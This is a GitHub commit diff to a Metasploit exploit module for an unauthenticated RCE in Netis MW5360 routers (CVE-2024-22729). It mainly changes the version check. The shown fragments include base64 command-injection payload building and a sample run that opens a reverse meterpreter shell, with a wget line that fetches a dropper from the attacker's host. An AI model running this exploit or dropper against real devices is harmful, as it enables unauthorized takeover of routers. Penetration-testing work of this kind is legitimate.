Updated check method

h00die-gr3y · Jun 6, 2024 · 55fa949 · 55fa949
1 parent e7d65fe
commit 55fa949
Show file tree

Hide file tree

Showing 2 changed files with 8 additions and 12 deletions.
diff --git a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
@@ -195,7 +195,7 @@ msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > exploit
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.1.1:80 can be exploited.
-[+] The target appears to be vulnerable. Netis MW5360 1.0.1.3442
+[+] The target appears to be vulnerable. Netis(MW5360)-V1.0.1.3442
 [*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.1.2:8080/IbZMnLDC
 [*] Executing wget -qO /tmp/kgfXdZZW http://192.168.1.2:8080/IbZMnLDC

diff --git a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
@@ -75,7 +75,7 @@ def execute_command(cmd, _opts = {})
     # store name of payload and cleanup payload file when session is established (see def on_new_session)
     @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
 
-    # skip last command to remove payload becuase it does not work
+    # skip last command to remove payload because it does not work
     unless cmd.include?('rm -f')
       app_random = Rex::Text.rand_text_alphanumeric(4..8)
       payload = Base64.strict_encode64("`#{cmd}`")
@@ -113,19 +113,15 @@ def check
     # trying to get the model and version number
     # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
     version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
-    model = res.body.match(/.?(model).?\s*:\s*.?((\\|[^,])*)/)
-    unless version.nil? || model.nil?
+    unless version.nil?
       version_number = version[2].split('-V')[1].chop
-      model_number = model[2].chop
+      model_number = version[2].split('-V')[0][/\(([^(]+)/, 1].chop
       # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower
-      if version_number && model_number == 'MW5360'
-        if Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442')
-          return CheckCode::Appears("Netis #{model_number} #{version_number}")
-        end
-
-        return CheckCode::Safe("Netis #{model_number} #{version_number}")
+      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))
+        return CheckCode::Appears(version[2].chop.to_s)
       end
-      CheckCode::Safe("#{model_number} #{version_number}")
+
+      return CheckCode::Safe(version[2].chop.to_s)
     end
     CheckCode::Safe
   end